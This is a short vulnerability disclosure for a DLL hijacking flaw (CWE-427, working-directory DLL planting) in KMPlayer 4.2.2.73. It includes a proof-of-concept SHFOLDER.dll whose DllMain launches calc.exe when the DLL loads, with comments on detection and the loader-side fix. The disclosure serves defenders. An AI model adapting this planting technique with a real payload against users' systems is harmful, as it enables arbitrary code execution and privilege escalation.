PandoraTV.
KMPlayer x32
KMPlayer_4.2.2.73(Latest)
KMPlayer was discovered to contain a DLL hijacking vulnerability that allows attackers to escalate privileges and execute arbitrary code via a crafted DLL.
SHFOLDER.dll
CWE-427: Uncontrolled Search Path Element
Current Working Directory (CWD) DLL planting
https://drive.google.com/file/d/1bdYaDmtWhnjaHkzv3bZ4PUSMzDJ8JjSV/view?usp=sharing
kmp32# tree
.
├── KMPlayer_4.2.2.73.exe
├── KMPlayer_poc.mp4
└── SHFOLDER.dll
// dllmain.cpp
#include "pch.h"
#include <stdlib.h>
/*
 * Entry point of the proof-of-concept SHFOLDER.dll listed in the tree above.
 * It only demonstrates that code from a DLL resolved out of the working
 * directory (CWE-427, see the notes above) runs inside the host process:
 * on DLL_PROCESS_ATTACH it spawns calc.exe as a visible marker and does
 * nothing else. The remaining reason codes are deliberate no-ops.
 *
 * From a defender's view the observable is the media player process
 * loading a DLL from its working directory and then starting an unexpected
 * child process; the fix is on the loader side (fully qualified or
 * system-directory-only DLL loading), not in this stub.
 *
 * hModule            - handle of this DLL, unused here
 * ul_reason_for_call - loader notification (DLL_PROCESS_ATTACH etc.)
 * lpReserved         - loader-supplied, unused here
 * Returns TRUE so the load is reported as successful to the loader.
 */
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// Proof-of-execution marker: a Calculator window appearing shows the
// planted DLL was loaded and its code ran in the player's process.
system("calc.exe");
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
// Report success; returning FALSE would make the loader abort the load.
return TRUE;
}